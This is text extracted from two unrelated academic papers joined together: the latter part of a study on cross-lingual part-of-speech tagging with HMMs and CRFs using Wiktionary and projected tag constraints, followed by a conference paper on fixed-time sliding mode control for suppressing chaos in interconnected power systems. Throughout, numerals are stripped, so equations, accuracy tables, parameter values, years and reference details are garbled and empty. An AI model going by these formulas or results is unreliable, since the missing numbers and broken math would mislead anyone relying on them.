and pβ(yi | yi− ) = exp ( β>φ(yi,yi− ) ) ∑ y′i∈t exp (β>φ(y′i,yi− )) . in maximum-likelihood estimation of the parameters, we seek to maximize the likelihood of the observed parts of the data. for this we need the joint marginal distribution pβ(x,ŷ(x,ỹ)) of a sentence x, and its coupled constraints lattice ŷ(x,ỹ), which is obtained by marginalizing over all consistent outputs: pβ(x,ŷ(x,ỹ)) = ∑ y∈ŷ(x,ỹ) pβ(x,y) . if there are no projections and no tag dictionary, then ŷ(x,ỹ) = t |x|, and thus pβ(x,ŷ(x,ỹ)) = pβ(x), which reduces to fully unsupervised learning. the ` -regularized marginal joint log-likelihood of the constrained training data d = {(x(i), ỹ(i))}ni= is: l(β;d) = n∑ i= log pβ(x (i),ŷ(x(i), ỹ(i)))−γ‖β‖ . ( ) we follow berg-kirkpatrick et al. ( ) and take a direct gradient approach for optimizing eq. with l-bfgs (liu and nocedal, ). we set γ = and run iterations of l-bfgs. one could also em- ploy the expectation-maximization (em) algorithm (dempster et al., ) to optimize this objective, al- though the relative merits of em versus direct gradi- ent training for these models is still a topic of debate (berg-kirkpatrick et al., ; li et al., ). note that since the marginal likelihood is non-concave, we are only guaranteed to find a local maximum of eq. . after estimating the model parameters β, the tag- sequence y∗ ∈ y(x) for a sentence x ∈ x is pre- dicted by choosing the one with maximal joint prob- ability: y∗ ← arg max y∈y(x) pβ(x,y) . we trained the hmm with em as well, but achieved better results with direct gradient training and hence omit those results. . crfs with coupled constraints whereas an hmm models the joint probability of the input x ∈x and output y ∈y(x), using locally normalized component distributions, a conditional random field (crf) instead models the probability of the output conditioned on the input as a globally nor- malized log-linear distribution (lafferty et al., ): pθ(y | x) = exp ( θ>Φ(x,y) ) ∑ y′∈y(x) exp (θ >Φ(x,y′)) , where θ is a parameter vector. as for the hmm, y(x) is not necessarily the full space of possible tag-sequences; specifically, for us, it is the dictionary- pruned lattice without the token constraints. with a first-order markov assumption, the feature function factors as: Φ(x,y) = |x|∑ i= φ(x,yi,yi− ) . this model is more powerful than the hmm in that it can use richer feature definitions, such as joint in- put/transition features and features over a wider input context. we model a marginal conditional probabil- ity, given by the total probability of all tag sequences consistent with the lattice ŷ(x,ỹ): pθ(ŷ(x,ỹ) | x) = ∑ y∈ŷ(x,ỹ) pθ(y | x) . the parameters of this constrained crf are estimated by maximizing the ` -regularized marginal condi- tional log-likelihood of the constrained data (riezler et al., ): l(θ;d) = n∑ i= log pθ(ŷ(x(i), ỹ(i)) | x(i)) −γ‖θ‖ . ( ) as with eq. , we maximize eq. with itera- tions of l-bfgs and set γ = . in contrast to the hmm, after estimating the model parameters θ, the tag-sequence y∗ ∈ y(x) for a sentence x ∈ x is chosen as the sequence with the maximal conditional probability: y∗ ← arg max y∈y(x) pθ(y | x) . empirical study we now present a detailed empirical study of the mod- els proposed in the previous sections. in addition to comparing with the state of the art in das and petrov ( ) and li et al. ( ), we present models with several combinations of token and type constraints, additional features incorporating word clusters. both generative and discriminative models are explored. . experimental setup before delving into the experimental details, we present our setup and datasets. languages. we evaluate on eight target languages used in previous work (das and petrov, ; li et al., ) and on seven additional languages (see ta- ble ). while the former eight languages all belong to the indo-european family, we broaden the coverage to language families more distant from the source language (for example, chinese, japanese and turk- ish). we use the treebanks from the conll shared tasks on dependency parsing (buchholz and marsi, ; nivre et al., ) for evaluation. the two- letter abbreviations from the iso - standard are used when referring to these languages in tables and figures. tagset. in all cases, we map the language-specific pos tags to universal pos tags using the mapping of petrov et al. ( ). since we use indirect super- vision via projected tags or wiktionary, the model states induced by all models correspond directly to pos tags, enabling us to compute tagging accuracy without a greedy -to- or many-to- mapping. bitext. for all experiments, we use english as the source language. depending on availability, there are between m and m parallel sentences for each language. the majority of the parallel data is gath- ered automatically from the web using the method of uszkoreit et al. ( ). we further include data from europarl (koehn, ) and from the un par- allel corpus (un, ), for languages covered by these corpora. the english side of the bitext is pos tagged with a standard supervised crf tagger, trained on the penn treebank (marcus et al., ), with tags mapped to universal tags. the parallel sen- for french we use the treebank of abeillé et al. ( ). we use version . of the mappings available at http: //code.google.com/p/universal-pos-tags/. tences are word aligned with the aligner of denero and macherey ( ). intersected high-confidence alignments (confidence > . ) are extracted and ag- gregated into projected type-level dictionaries. for purely practical reasons, the training data with token- level projections is created by randomly sampling target-side sentences with a total of k tokens. wiktionary. we use a snapshot of the wiktionary word definitions, and follow the heuristics of li et al. ( ) for creating the wiktionary dictionary by mapping the wiktionary tags to universal pos tags. features. for all models, we use only an identity feature for tag-pair transitions. we use five features that couple the current tag and the observed word (analogous to the emission in an hmm): word iden- tity, suffixes of up to length , and three indicator features that fire when the word starts with a capital letter, contains a hyphen or contains a digit. these are the same features as those used by das and petrov ( ). finally, for some models we add a word cluster feature that couples the current tag and the word cluster identity of the word. these (monolin- gual) word clusters are induced with the exchange algorithm (uszkoreit and brants, ). we set the number of clusters to across all languages, as this has previously been shown to produce robust results for similar tasks (turian et al., ; täckström et al., ). the clusters for each language are learned on a large monolingual newswire corpus. . models with type constraints to examine the sole effect of type constraints, we experiment with the hmm, drawing constraints from three different dictionaries. table compares the per- formance of our models with the best results of das and petrov ( , d&p) and li et al. ( , lg&t). as in previous work, training is done exclusively on the training portion of each treebank, stripped of any manual linguistic annotation. we first use all of our parallel data to generate projected tag dictionaries: the english pos tags are projected across word alignments and aggregated to tag distributions for each word type. as in das and petrov ( ), the distributions are then filtered with a threshold of . to remove noisy tags and to create the definitions were downloaded on august , from http://toolserver.org/˜enwikt/definitions/. this snapshot is more recent than that used by li et al. prior work hmm with type constraints lang. d&p lg&t yhmmproj. yhmmwik. yhmmunion yhmmunion +c bg – – . . . . cs – – . . . . da . . . . . . de . . . . . . el . . . . . . es . . . . . . fr – – . . . . it . . . . . . ja – – . . . . nl . . . . . . pt . . . . . . sl – – . . . . sv . . . . . . tr – – . . . . zh – – . . . . avg ( ) . . . . . . avg – – . . . . table : tagging accuracies for type-constrained hmm models. d&p is the “with lp” model in table of das and petrov ( ), while lg&t is the “shmm-me” model in table of li et al. ( ). yhmmproj. , yhmmwik. and yhmmunion are hmms trained solely with type constraints derived from the projected dictionary, wiktionary and the union of these dictionaries, respectively. yhmmunion +c is equivalent to yhmmunion with additional cluster features. all models are trained on the treebank of each language, stripped of gold labels. results are averaged over the languages from das and petrov ( ), denoted avg ( ), as well as over the full set of languages, denoted avg. an unweighted tag dictionary. we call this model yhmmproj. ; its average accuracy of . % on the eight languages is higher than the . % of d&p and on par with lg&t ( . %). our next model (yhmmwik. ) simply draws type constraints from wiktionary. it slightly underperforms lg&t ( . %), presumably because they used a second-order hmm. as a simple extension to these two models, we take the union of the projected dictionary and wiktionary to con- strain an hmm, which we name yhmmunion . this model performs a little worse on the eight indo-european languages ( . ), but gives an improvement over the projected dictionary when evaluated across all languages ( . % vs. . %). our model corresponds to the weaker, “no lp” projection of das and petrov ( ). we found that label propagation was only beneficial when small amounts of bitext were available. token constraints hmm with coupled constraints crf with coupled constraints lang. yhmmunion +c+l ỹhmm+c+l ỹcrf+c+l ŷhmmproj. +c+l ŷhmmwik. +c+l ŷhmmunion +c+l ŷcrfproj. +c+l ŷcrfwik. +c+l ŷcrfunion+c+l bg . . . . . . . . . cs . . . . . . . . ** . da . . . . . . . . * . de . . . . . . . . ** . el . . . . . . . . ** . es . ** . . . . . . . . fr . ** . . . . . . . . it . . . . . . . . . ja . . . . . . . . ** . nl . . . . . . . . ** . pt . . . . . . . . ** . sl . . . . . . . . . sv . . . . . . . . ** . tr . . . . . . . . ** . zh . . . . . . . . ** . avg ( ) . . . . . . . . . avg . . . . . . . . . table : tagging accuracies for models with token constraints and coupled token and type constraints. all models use cluster features (. . . +c) and are trained on large training sets each containing k tokens with (partial) token-level projections (. . . +l). the best type-constrained model, trained on the larger datasets, yhmmunion +c+l, is included for comparison. the remaining columns correspond to hmm and crf models trained only with token constraints (ỹ . . .) and with coupled token and type constraints (ŷ . . .). the latter are trained using the projected dictionary (·proj.), wiktionary (·wik.) and the union of these dictionaries (·union), respectively. the search spaces of the models trained with coupled constraints (ŷ . . .) are each pruned with the respective tag dictionary used to derive the coupled constraints. the observed difference between ŷcrfwik. +c+l and yhmmunion +c+l is statistically significant at p < . (**) and p < . (*) according to a paired bootstrap test (efron and tibshirani, ). significance was not assessed for avg or avg ( ). we next add monolingual cluster features to the model with the union dictionary. this model, yhmmunion +c, significantly outperforms all other type- constrained models, demonstrating the utility of word-cluster features. for further exploration, we train the same model on the datasets containing k tokens sampled from the target side of the parallel data (yhmmunion +c+l); this is done to explore the effects of large data during training. we find that training on these datasets result in an average accuracy of . % which is comparable to the . % reported for yhmmunion +c in table . this shows that the different source domain and amount of training data does not influence the performance of the hmm significantly. finally, we train crf models where we treat type constraints as a partially observed lattice and use the full unpruned lattice for computing the partition func- these are monolingual clusters. bilingual clusters as intro- duced in täckström et al. ( ) might bring additional benefits. tion (§ . ). due to space considerations, the results of these experiments are not shown in table . we ob- serve similar trends in these results, but on average, accuracies are much lower compared to the type- constrained hmm models; the crf model with the union dictionary along with cluster features achieves an average accuracy of . % when trained on same data. this result is not unsurprising. first, the crf’s search space is fully unconstrained. second, the dic- tionary only provides a weak set of observation con- straints, which do not provide sufficient information to successfully train a discriminative model. how- ever, as we will observe next, coupling the dictionary constraints with token-level information solves this problem. . models with token and type constraints we now proceed to add token-level information, focusing in particular on coupled token and type constraints. since it is not possible to generate projected token constraints for our monolingual treebanks, we train all models in this subsection on the k-tokens datasets sampled from the bi- text. as a baseline, we first train hmm and crf models that use only projected token constraints (ỹhmm+c+l and ỹcrf+c+l). as shown in table , these models underperform the best type-level model (yhmmunion +c+l), which confirms that projected to- ken constraints are not reliable on their own. this is in line with similar projection models previously examined by das and petrov ( ). we then study models with coupled token and type constraints. these models use the same three dictio- naries as used in § . , but additionally couple the derived type constraints with projected token con- straints; see the caption of table for a list of these models. note that since we only allow projected tags that are licensed by the dictionary (step of the trans- fer, § . ), the actual token constraints used in these models vary with the different dictionaries. from table , we see that coupled constraints are superior to token constraints, when used both with the hmm and the crf. however, for the hmm, cou- pled constraints do not provide any benefit over type constraints alone, in particular when the projected dictionary or the union dictionary is used to derive the coupled constraints (ŷhmmproj. +c+l and ŷhmmunion +c+l). we hypothesize that this is because these dictionar- ies (in particular the former) have the same bias as the token-level tag projections, so that the dictionary is unable to correct the systematic errors in the pro- jections (see § . ). since the token constraints are stronger than the type constraints in the coupled mod- els, this bias may have a substantial impact. with the wiktionary dictionary, the difference between the type-constrained and the coupled-constrained hmm is negligible: yhmmunion +c+l and ŷhmmwik. +c+l both av- erage at an accuracy of . %. the crf model, on the other hand, is able to take advantage of the complementary information in the coupled constraints, provided that the dictionary is able to filter out the systematic token-level errors. with a dictionary derived from wiktionary and pro- jected token-level constraints, ŷcrfwik. +c+l performs to make the comparison fair vis-a-vis potential divergences in training domains, we compare to the best type-constrained model trained on the same k tokens training sets. number of token−level projections t a g g in g a c c u ra c y number of tags listed in wiktionary figure : relative influence of token and type constraints on tagging accuracy in the ŷcrfwik. +c+l model. word types are categorized according to a) their number of wiktionary tags ( , , or + tags, with representing no wiktionary entry; top-axis) and b) the number of times they are token- constrained in the training set (divided into buckets of , - , - and + occurrences; x-axis). the boxes summarize the accuracy distributions across languages for each word type category as defined by a) and b). the horizontal line in each box marks the median accuracy, the top and bottom mark the first and third quantile, re- spectively, while the whiskers mark the minimum and maximum values of the accuracy distribution. better than all the remaining models, with an average accuracy of . % across the eight indo-european languages available to d&p and lg&t. averaged over all languages, its accuracy is . %. further analysis in this section we provide a detailed analysis of the impact of token versus type constraints and we study the pruning and filtering mistakes resulting from in- complete wiktionary entries in detail. this analysis is based on the training portion of each treebank. . influence of token and type constraints the empirical success of the model trained with cou- pled token and type constraints confirms that these constraints indeed provide complementary signals. figure provides a more detailed view of the rela- tive benefits of each type of constraint. we observe several interesting trends. first, word types that occur with more token con- straints during training are generally tagged more accurately, regardless of whether these types occur . . . . . number of corrected wiktionary entries p ru n in g a cc u ra cy figure : average pruning accuracy (line) across lan- guages (dots) as a function of the number of hypotheti- cally corrected wiktionary entries for the k most frequent word types. for example, position on the x-axis cor- responds to manually correcting the entries for the most frequent types, while position corresponds to ex- perimental conditions. in wiktionary. the most common scenario is for a word type to have exactly one tag in wiktionary and to occur with this projected tag over times in the training set (facet , rightmost box). these com- mon word types are typically tagged very accurately across all languages. second, the word types that are ambiguous accord- ing to wiktionary (facets and ) are predominantly frequent ones. the accuracy is typically lower for these words compared to the unambiguous words. however, as the number of projected token con- straints is increased from zero to + observations, the ambiguous words are effectively disambiguated by the token constraints. this shows the advantage of intersecting token and type constraints. finally, projection generally helps for words that are not in wiktionary, although the accuracy for these words never reach the accuracy of the words with only one tag in wiktionary. interestingly, words that occur with a projected tag constraint less than times are tagged more accurately for types not in the dictionary compared to ambiguous word types with the same number of projected constraints. a possible explanation for this is that the ambiguous words are inherently more difficult to predict and that most of the words that are not in wiktionary are less common words that tend to also be less ambiguous. zh tr sv sl pt nl ja it fr es el de da cs bg avg proportion of pruning errors pron noun det adp prt adv num conj adj verb x . figure : prevalence of pruning mistakes per pos tag, when pruning the inference search space with wiktionary. . wiktionary pruning mistakes the error analysis by li et al. ( ) showed that the tags licensed by wiktionary are often valid. when using wiktionary to prune the search space of our constrained models and to filter token-level projec- tions, it is also important that correct tags are not mistakenly pruned because they are missing from wiktionary. while the accuracy of filtering is more difficult to study, due to the lack of a gold standard tagging of the bitext, figure (position on the x- axis) shows that search space pruning errors are not a major issue for most languages; on average the pruning accuracy is almost %. however, for some languages such as chinese and czech the correct tag is pruned from the search space for nearly % of all tokens. when using wiktionary as a pruner, the upper bound on accuracy for these languages is therefore only around %. however, figure also shows that with some manual effort we might be able to remedy many of these errors. for example, by adding miss- ing valid tags to the most common word types in the worst language, the minimum pruning accuracy would rise above % from below %. if the same was to be done for all of the studied languages, the mean pruning accuracy would reach over %. figure breaks down pruning errors resulting from incorrect or incomplete wiktionary entries across the correct pos tags. from this we observe that, for many languages, the pruning errors are highly skewed towards specific tags. for example, for czech over % of the pruning errors are caused by mistak- enly pruned pronouns. conclusions we considered the problem of constructing multilin- gual pos taggers for resource-poor languages. to this end, we explored a number of different models that combine token constraints with type constraints from different sources. the best results were ob- tained with a partially observed crf model that ef- fectively integrates these complementary constraints. in an extensive empirical study, we showed that this approach substantially improves on the state of the art in this context. our best model significantly out- performed the second-best model on out of evaluated languages, when trained on identical data sets, with an insignificant difference on languages. compared to the prior state of the art (li et al., ), we observed a relative reduction in error by %, averaged over the eight languages common to our studies. acknowledgments we thank alexander rush for help with the hyper- graph framework that was used to implement our models and klaus macherey for help with the bi- text extraction. this work benefited from many dis- cussions with yoav goldberg, keith hall, kuzman ganchev and hao zhang. we also thank the editor and the three anonymous reviewers for their valuable feedback. the first author is grateful for the financial support from the swedish national graduate school of language technology (gslt). references anne abeillé, lionel clément, and françois toussenel. . building a treebank for french. in a. abeillé, editor, treebanks: building and using parsed corpora, chapter . kluwer. taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsupervised learning with features. in proceedings of naacl-hlt. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll. stanley f chen. . conditional and joint models for grapheme-to-phoneme conversion. in proceedings of eurospeech. christos christodoulopoulos, sharon goldwater, and mark steedman. . two decades of unsupervised pos induction: how far have we come? in proceed- ings of emnlp. dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of acl-hlt. arthur p. dempster, nan m. laird, and donald b. rubin. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society, series b, . john denero and klaus macherey. . model-based aligner combination using dual decomposition. in pro- ceedings of acl-hlt. brad efron and robert j. tibshirani. . an introduc- tion to the bootstrap. chapman & hall, new york, ny, usa. victoria fossum and steven abney. . automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. in proceedings of ijcnlp. dan garrette and jason baldridge. . type-supervised hidden markov models for part-of-speech tagging with incomplete tag dictionaries. in proceedings of emnlp- conll. yoav goldberg, meni adler, and michael elhadad. . em can find pretty good hmm pos-taggers (when given a good start). in proceedings of acl-hlt. philipp koehn. . europarl: a parallel corpus for statistical machine translation. in mt summit. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in proceedings of icml. shen li, joão graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in proceedings of emnlp-conll. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming, . mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated corpus of english: the penn treebank. computational linguis- tics, ( ). tahira naseem, benjamin snyder, jacob eisenstein, and regina barzilay. . multilingual part-of-speech tagging: two unsupervised approaches. jair, . joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of emnlp-conll. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of lrec. sujith ravi and kevin knight. . minimized models for unsupervised part-of-speech tagging. in proceed- ings of acl-ijcnlp. stefan riezler, tracy h. king, ronald m. kaplan, richard crouch, john t. maxwell, iii, and mark johnson. . parsing the wall street journal using a lexical-functional grammar and discriminative estimation techniques. in proceedings of acl. noah smith and jason eisner. . contrastive estima- tion: training log-linear models on unlabeled data. in proceedings of acl. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proceedings of naacl-hlt. joseph turian, lev-arie ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl. un. . ods un parallel corpus. jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in proceedings of acl-hlt. jakob uszkoreit, jay ponte, ashok popat, and moshe dubiner. . large scale parallel document mining for machine translation. in proceedings of coling. chenhai xi and rebecca hwa. . a backoff model for bootstrapping resources for non-english languages. in proceedings of hlt-emnlp. david yarowsky and grace ngai. . inducing mul- tilingual pos taggers and np bracketers via robust projection across aligned corpora. in proceedings of naacl. international conference on sensor network and computer engineering (icsnce ) a new non-singular terminal sliding mode control and its application to chaos suppression in interconnected power system wang nian, chen hui, ding dawei school of electronics and information engineering, anhui university hefei, , china e-mail: wn_xlb@ahu.edu.cn power quality engineering research center, min of education hefei, , china e-mail: @qq.com abstract—interconnected power system is a typical nonlinear dynamical system, it will cause great harm to the interconnected power system when the chaos occurred. this paper analyses the nonlinear dynamical behavior of the interconnected power system with a uncertain electromagnetic disturbance amplitude, and the influence of the electromagnetic disturbance amplitude on the stability of the system is obtained. thus, this paper proposes a novel non-singular terminal sliding mode control to restrain the chaos, then the system will reach a stable state in a fixed time. according to the theoretical analysis, by introducing the saturation function, the control method can solve the singularity problem in the sliding mode control, and the interconnected power system will be stable in a short time when it’s in chaos. the simulation prove the correctness of the method. keywords-interconnected power system; saturation function; non-singularity; sliding mode control; fixed time i. introduction power system is a kind of nonlinear dynamical system with multi-degree of freedom, strong coupling and multi-variable, which has rich dynamical behaviors. with the development of power grid system, grid interconnection has became a inevitable trend, and it can improve the quality of power. at the same time, it also provides convenience for the dispatching optimization of power system[ - ]. however, chaos often appears in the interconnected power system, it will bring great challenge to the stability of power system. for example, as the result of chaotic oscillations[ - ], several large area power outages appear in the united states, china and canada in . and it is difficult to suppress this phenomenon by using linear controller[ ]. therefore, it is necessary to study the mechanism of chaos in interconnected power systems and it is meaningful to design the nonlinear controller to suppress the chaos. due to the high nonlinear characteristics of the interconnected power system, its stability is very sensitive to outside disturbance. if the perturbation is too large, its operating point will change obviously. there are also some tools to analyze its stability which include geometric method, energy function, bifurcation theory and numerical simulation[ ]. recently, there are a lot of scholars to study the stability of power grid system. for example, nayfeh [ ] uses the multi-scale perturbation method to study the stability of single machine power system and the bifurcation analysis of a single machine infinite power system is investigated by duan[ ]. because coupling power angle exists in the interconnected power system, the inherent dynamical behavior of interconnected power system will be more abundant. through the detailed numerical simulation, the influence of the conventional non-linearity index on the dynamic characteristics of the interconnected power system is expounded[ ]. international conference on sensor network and computer engineering (icsnce ) in recent years, with the development of control method, the system is controlled from the single machine infinite system to multiple machine system, and the interconnected power system. in this paper, by proposing a fix-time non-singular terminal sliding mode control to realize stability when chaos occurred in interconnection power system. some systems can be stabilized in a fixed time by using finite time control, this control method can be used in a lot of fields (for instance[ - ]). however, it is difficult to ensure the boundary convergence time when it is independent of the initial state. therefore, in some practical system, it is not workable to use this control method when the initial condition is uncertain. fortunately, this question was solved by polyakov with the fixed-time stability theory[ ]. zuo[ ] proposed a non-singular fixed-time terminal sliding mode controller for a class of second order nonlinear systems that can solve the singularity problem of terminal sliding mode controller in most instances. in this paper, by using the fast terminal sliding mode control can make the system convergence to steady state in finite time, the saturation function[ ] and fast fixed time stability theory that can solve the singular problem through theoretical proof in this control method. this control method not only solve the singularity problem of the sliding mode controller, but the convergence speed is faster. motivated by the above analysis, this paper investigated the dynamical characteristics and control of interconnected power system. section introduces the dynamical characteristics of the interconnected power system, by introducing the maximum lyapunov index, power spectrum, phase diagram and timing diagram, the paper decribe the dynamic of the interconnected power system. when the amplitude of electromagnetic disturbance is v= . ,the system is in chaos. a non-sigular sliding mode variable structure control method has been introduced in section and the effectiveness of the control method can be obtained by theoretical analysis, the advantages of this method are verified, and the convergence time is calculated in section .and section gives the conclusion of this paper. ii. the analysis of the model and dynamic characteristics of the interconnected power system there are two kinds of oscillation modes in interconnection power system, one is a single generator acts on other generators in the system with the frequency is between . and . hz. the other oscillation mode is mainly expressed as a generator group in a region interacts with a generator group in another area, the frequency is between . - . hz. this paper studies the interconnected power system model with two generators. considering the influence of the amplitude of the electromagnetic disturbance power, the model is as follows: ( ) ( ), ( ) [ sin( ( )) ( ) cos( ) sin( ( )) cos( )] s m k e d t t dt d t p t d t p p t t p t dt h                 where, ( )t is the phase angle between the excitation potential and the terminal voltage between the two generators, and ( )t is the angular velocity of the two generators. d is the equivalent damping coefficient. , , , s m e k p p p p represents the amplitude of the electromagnetic power, the mechanical power, the load disturbance power, and the electromagnetic disturbance power, respectively. ,  is the electromagnetic power disturbance frequency and the load disturbance frequency. h is the equivalent moment of inertia. in order to analyses the dynamics of the interconnected power system, the simplified model is obtained: ( ) ( ), ( ) sin( ( )) ( ) cos( ) sin( ( )) cos( ) dx x d dx x x v x d                     ( ) where ( ) ( ), ( ) ( ) / , / , / , / , / , / , / , / s s m s k s e s s s s x t x t h p d hp p p v p p p p h p h p t p h                      here, the parameters can be selected as . , . , . , .            . a. lyapunov exponent the lyapunov exponent is an important parameter of the system that can be used to measure and determine whether international conference on sensor network and computer engineering (icsnce ) the dynamic system is in the chaos. when the maximum lyapunov exponent of the dynamic system is greater than , it can be concluded that the system is in chaotic oscillation state. figure . the lyapunov exponent b. power spectrum to study the chaotic behavior of a system, it is effective to use power spectrum analysis methods. actually, power spectrum analysis is through the time and space translate to the frequency space for the signal frequency structure. when the chaos occurs in the system, the power spectrum of the system behaves as a continuous irregular distribution, for example in fig. (c). (a) (b) (c) figure . power spectrum similarly, the phase space map also is a tool to determine whether the system is in chaos. (a) (b) (c) figure . phase plane plots international conference on sensor network and computer engineering (icsnce ) according to the maximum lyapunov exponent, phase diagram, and power spectrum of interconnected power system, we can know that the interconnected power system is in an irregular non-periodic chaotic state when the parameter . v  .this chaotic state will cause great harm to the stability of the system, it will lead to a large area of power outages. therefore, it is necessary to study the method to restrain the chaos in interconnected power system. iii. the sliding mode controller design in this section, the paper proposes a control scheme that can restrain chaos in power system, this paper needs to add control law in the second item in control equation that can make the system output x convergences to the control target, namely, , ( ) ( , ) ( ) , x x x f x g x t d t u         ( ) where : ( ) sinf x x x     : ( , ) cos( ) sing x t v t x  , ( ) cos( )d t t  . by proposing a timing non-singular fast terminal control method, the system can be smoothly stabilized on the sliding surface s . the sliding surface s is designed as: ( ) (| | ) m m p sign x n n q s x x x         ( ) the paper can get the reach law : ( ) (| | ) m m p sign s n n q s s s          here, after reading the relevant literature [ ] about how to overcome the singularity in terminal sliding mode control. this paper quotes saturation function that can solve the question. ( ) (| |) ( ) (| | ) [ ( ) ( ( ) (| | )) ] ( , ) m m sign x n n p q m m p sign s n n q m u f x dt n m sign x x x n p sat x x h q s s                         ( ) in control input, the paper quotes saturation function to limit the amplitude of singularity term p q x x  ,where the saturation function is , | | , ( , ) ( ), | | , x if x y sat x y y sign x if x y      ( ) theorem in control law( ), if there is a positive number , , ,    ,and also m , n , m , n , p , q , p , q is odd positive integers satisfying m n , m n , p q , p q , and ( ) / m n , ( ) / m n , ( ) / p q , ( )p q is odd positive integers. the system will be stable in a fixed time. proof v s  ( )  ( ) (| | ) ( ) (| | ) ( ) (| | ) ( ) ( ) ( ) m m p sign s n n q m m p sign s n n q m m p sign s n n q v s s s s s s s v v                                     when | | s  ( ) ( ) m p n q v v v       ( ) international conference on sensor network and computer engineering (icsnce ) when | | s  ( ) ( ) p q v v v      ( ) obviously, v  , so the control system will stable in expect target non-singularity. theorem the singularity item of the control input is restricted by the saturation function method, so that the system does not affect the stability analysis even if there is a singular region. proof defined inequality | | p qp x x h q    as the singularity area. the state variable x in first equation at system( ). ( ) ( ) ( ) t x t x x d   ( ) when ( ) x t  , ( )x t will increase monotonically and leave the singularity. if ( ) x t  , ( )x t will decrease monotoniclly and leave the singularity. therefore, the existence of the singular region does not affect the results of the stability analysis . arrival time analysis consider the following differential equation ( ) (| | ) pm m sign y qn nx x x         ( ) where, assuming ,    , and , , ,m n p q is odd positive integers, the system will stable in a fix time. proof the above system can be written as follows: ,| | ,| | pm qn p q x x x x x x x x                  ( ) a new variable is defined as p q z x   , so, the first equation in the above system can be written m p n q p qq p q p z z q q         ( ) let [( ) ] / [ ( )]m n q n q p    , can get q p q p z z q q         ( ) similarly available, the second equation in system can be obtained q p q p z z q q        ( ) so, the maximum convergence time is lim ( ) lim ( ) ( ln( )) ln( ) z z z q t z dz dz q p z z q n q q p m n q p                                 ( ) without losing the general consideration of second order systems, the fix time for the controlled system to reach the slid surface is ln( ) m p n q n q t m n q p            ( ) when the controlled system reaches the sliding surface s  , the target sliding mode of the system satisfies the following ( ) (| | ) m m p sign x n n q x x x x          ( ) the corresponding system x will converge in a fixed time: ln( ) m p n q n q t m n q p            ( ) the convergence time for system is ln( ) ln( ) m p n q m p n q n q t t t m n q p n q m n q p                         ( ) iv. simulation experiment the proposed control method is applied to suppress chaotic oscillation in studied power system. the parameters international conference on sensor network and computer engineering (icsnce ) of the controller is   ,   ,   ,   , m  , n  , m  , n  , h  , p  , q  , p  , q  . the initial value of the controlled system is [ , ] [ . , . ]x x  .the dynamics of the system under this parameter have been obtained in the second part, and the system is in a chaotic state before it is controlled. as shown in figure , before being controlled, the system is in a chaos. figure . time domain waveform(uncontrolled) figure . time domain waveform after control figure . phase plane plots international conference on sensor network and computer engineering (icsnce ) figure . power spectrum from fig. , this paper can get that the system under chaotic oscillation is controlled by the control method proposed in this paper, then it will converge quickly to the desired target within a fixed time. by contrasting the fig. , fig. , this can find this result. the system will be in chaos when it’s uncontrolled, but the method which have proposed in this paper apply in the interconnected system, the system is stabilized. v. conclusion in this paper, by plotting the lyapunov exponent diagram, power spectrum and phase diagram of the interconnected power system, the influence of the amplitude of the electromagnetic disturbance for the system has been analyzed. according to the three stability criteria, when the system parameter . v  , the interconnected power system will be in chaos. so, a non-singular terminal sliding mode control method with fixed time stability has been applied in the system when it’s in chaos. by comparing the system output, we can find that the control method proposed in this paper can restrain the chaotic oscillation, and the interconnection system is stabilized in a fixed time. the singularity problem in the terminal sliding mode control is eliminated by introducing the saturation function. due to the timing convergence characteristics and non-singularity of the proposed method, it will be applied to the actual power equipment. vi. acknowledgment the paper supported by national natural science foundation of china ( ) and major science and technology projects in anhui province ( ). references [ ] fuhong min ,yaoda wang, guangya peng, enrong wang,and jane a.auth, , “bifurcations, chaos and adaptive backstepping sliding mode control of a power system with excitation limitation”.aip advances, , [ ] jyoti ranjan nayak, tridipta kumar pati, binod kumar sahu, sanjeeb kumar kar, , iccpct “fuzzy-pid controller optimized tlbo algorithm on automatic generation control of a two-area interconnected power system” [ ] sat sat aung, zaw min htike asrjets “modeling and simulation of load frequency control for three area power system using proportional integral derivative (pid) controller” - [ ] chen ju-hua,xu nan.application resrarch on small signal stability analysis of power systems”.proceedings of the csee, , ( ): - [ ] du quwei, xiaoshu luo.passivity-based adaptive control of chaotic oscillations in power system”. chaos solitons&fractals . ( ): - [ ] mm zirkohi, tkumbasar, t lin, “hybrid adapive type- fuzzy tracking control of chaoic oscillation damping of power systems” asian journal of control . [ ] j ni, l liu, c liu, x hu.chattering-free time scale separation sliding mode control design with application to power system chaos suppressin.mathematical problems in engineering, : - . [ ] q sun, y zhang, h he, d ma, h zhang.a novel energy function-based stability evaluation and nonlinear control approach for energy internet.ieee transactions on smart grid, , pp( ) - [ ] ali nayfeh dean t. mook donald w.lobitz numerical perturbation method for the nonlinear analysis of structural vibrations - [ ] xiaodong wang, yushu chen, gang han, caiqin song “nonlinear dynamic analysis of a single-machine infinite bus power system applied mathematical modelling “ - international conference on sensor network and computer engineering (icsnce ) [ ] min fu-hong, ma mei-ling zhai wei wang en-rong ” chaotic control of the interconnected power system based on the relay characteristic function” acta phys. sin. [ ] x. y. he, q. y. wang, and w. w. yu, “finite-time containment control for second-order multiagent systems under directed topology,” ieee trans. circuits syst. ii, exp. briefs, vol. , no. , pp. - , aug. [ ] y. q. wu, b. wang, and g. d. zong, “finite-time tracking controller design for nonholonomic systems with extended chained form,” ieee trans. circuits syst. ii, exp. briefs, vol. , no. , pp. - , nov. [ ] a. polyakov, “nonlinear feedback design for fixed-time stabilization of linear control systems,” ieee trans. autom. control, vol. , no. 